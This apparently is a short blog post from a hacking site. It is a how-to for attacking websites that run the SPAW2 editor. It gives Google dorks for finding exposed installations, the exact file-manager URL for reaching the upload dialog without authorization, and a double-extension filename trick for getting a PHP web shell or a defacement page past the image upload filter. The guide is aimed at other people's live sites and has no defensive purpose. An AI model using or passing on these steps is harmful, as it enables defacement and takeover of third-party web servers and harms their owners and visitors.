Spaw is a Vulnerability, you Can Upload your deface & Shell Easily in Vulnerable websites
Lets Start
We can find the vulnerable sites using these Google Dorks-
inurl:”spaw2/dialogs/”
inurl:”spaw2/uploads/files/”
You will get results Like this
“Index of/ spaw2/dialogs/” or
:site.com/abc/spaw2/uploads/files/abc/abc.pdf
Now replace the Spaw2/Uploads/abc/abc with this url-
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
For Example See this Example website after replacing the above url- Click here
Now you will Got a window like this-
If you want to Upload deface page then Select files option … and i f you want to upload shell then select image option and upload your shell as shell.php;,jpg
Categories:
hacking
0 comments:
Post a Comment